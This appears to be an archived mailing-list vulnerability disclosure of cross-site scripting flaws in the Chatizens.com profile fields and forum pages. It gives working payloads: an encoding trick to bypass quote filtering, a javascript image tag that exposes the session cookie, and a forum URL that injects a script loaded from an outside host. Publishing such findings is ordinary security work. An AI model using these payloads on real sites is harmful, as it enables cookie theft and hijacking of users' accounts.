<<< Date Index >>>     <<< Thread Index >>>

Chatizens.com - XSS with cookie disclosure



Chatizens.com Also known as Chattown.com

Homepage:
http://www.chatizens.com

Affected files:

* Profile input boxes:

All input boxes of your profile.

* Browsing the forums
--------------------------------------------

XSS vuln with cookie disclosure via profile input boxes.

To bypass chatizens filters of adding backslashes to ' and ", we use the long 
UFT-8 unicode of '. PoC:

<img src=javascript:alert(&#0000039XSS&#0000039)>

And to display our cookie:

<IMG SRC=javascript:alert(document.cookie)>

Screenshot:
http://www.youfucktard.com/xsp/chatizen1.jpg
http://www.youfucktard.com/xsp/chatizen2.jpg

---------------------------------------------
heh, it seems chatizens.com is using a webapp I auditing before, Alstrasoft 
E-Friends. 

Screenshot:
http://www.youfucktard.com/xsp/chatizen3.jpg

-------------------------------------------

XSS vuln via viewing forum categories:

http://chatizens.com/friends/index.php?mode=forums&act=viewcat&seid=19";>">">'><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT><""><'<"

Screenshot:
http://www.youfucktard.com/xsp/chatizen4.jpg